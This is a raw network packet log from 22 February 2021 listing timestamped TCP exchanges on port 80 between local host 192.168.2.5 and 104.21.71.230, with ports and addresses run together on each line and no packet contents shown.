                                                                                                                                                                Feb 22, 2021 07:45:18.254270077 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.254287958 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.254302979 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.254307985 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.254323959 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.254327059 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.254349947 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.254374981 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.255022049 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.255094051 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471314907 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471353054 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471378088 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471401930 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471425056 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471431017 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471448898 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471477032 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471489906 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471504927 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471519947 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471530914 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471549988 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471554995 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471580982 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471591949 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471648932 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471673012 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471698046 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471721888 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471728086 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471754074 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471760035 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471777916 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471796989 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471803904 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471827984 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471851110 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471859932 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471874952 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471899033 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.471910000 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.471956015 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.472604990 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472645044 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472670078 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472693920 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472709894 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.472718954 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472739935 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.472744942 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472769976 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472785950 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.472794056 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472819090 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472846031 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472858906 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.472867012 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.472886086 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.496356964 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496388912 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496413946 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496438026 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496454954 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.496463060 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496490955 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.496491909 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496519089 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496535063 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.496542931 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496567011 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496570110 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.496593952 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496618032 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496620893 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.496670961 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.496826887 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496854067 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496881008 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496901035 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:18.496937037 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.496953011 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:18.657479048 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:20.620404959 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:20.667841911 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:20.684407949 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:20.684444904 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:20.684463978 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:20.684479952 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:20.684616089 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.038271904 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.085602045 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.085691929 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.086365938 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.133476973 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.237845898 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.237896919 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.237936020 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.237962008 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.237978935 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.237999916 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.238013983 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.238034964 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.238069057 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.238106966 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.238111973 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.238148928 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.238182068 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.238208055 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.238245964 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.238856077 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.238926888 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.239698887 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.240031004 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.240088940 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.240252018 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.241202116 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.241240025 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.241323948 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.242188931 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.242279053 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.243196964 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.243298054 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.243352890 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.243503094 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.244411945 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.244455099 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.244523048 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.245490074 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.364455938 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.571939945 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.571966887 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.572033882 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.572407961 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.572429895 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.572554111 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.573512077 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.573560953 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.573632956 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.574604034 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.633440018 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.633469105 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.633513927 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.633919001 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.633939981 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.633992910 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.635020971 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.635045052 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.635129929 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.636059046 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.636085987 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.636149883 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.637181044 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.637206078 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.637269974 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.638282061 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.638326883 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.638345003 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.639391899 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.639415026 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.639473915 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.640474081 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.640501022 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.640541077 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.641575098 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.641596079 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.641663074 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.642712116 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.642745972 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.642771959 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.666304111 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.666399956 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.666414976 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.666763067 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.666837931 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.666846991 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.667870998 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.667906046 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.667932987 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.668966055 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.669060946 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.669121027 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.670063019 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.670099974 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.670193911 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.671179056 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.671220064 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.671288967 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.672293901 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.672363997 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.672393084 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.673408031 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.673445940 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.673516989 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.675363064 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.675396919 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.675462961 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.675894022 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.675945997 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.675962925 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.677011967 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.677040100 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.677105904 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.678152084 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.678181887 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.678232908 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.679243088 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.679299116 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.679307938 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.680341005 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.680368900 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.680485964 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.681427002 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.681457996 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.681504965 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.682568073 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.682596922 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.682631969 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.683629990 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.683703899 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.683770895 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.684735060 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.684768915 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.684796095 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.685859919 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.685889006 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.685951948 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.686958075 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.686985016 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.687052011 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.703692913 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.703737974 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.703833103 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.704144001 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.704176903 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.704221010 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.705243111 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.705276012 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.705353022 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.706298113 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.706358910 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.706387997 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.713465929 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.713501930 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.713593960 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.714039087 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.714066029 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.714174032 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.715111971 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.715162992 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.715183973 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.716198921 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.716224909 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.716295958 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.717298031 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.717324018 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.717442036 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.718444109 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.718489885 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.718521118 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.719526052 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.719553947 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.719620943 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.720603943 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.720628977 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.720669031 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.722522020 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.722552061 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.722632885 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.723028898 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.723063946 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.723113060 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.724148989 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.724172115 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.724257946 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.725250959 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.725290060 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.725367069 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.726356030 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.726386070 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.726418972 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.727449894 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.727471113 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.727534056 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.728554964 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.728637934 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.732181072 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.732203007 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.732275963 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.732515097 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.732537031 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.733201027 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.733222008 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.733257055 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.733284950 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.733879089 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.733935118 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.733997107 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:50.734601974 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:50.734643936 CET8049723104.21.71.230192.168.2.5
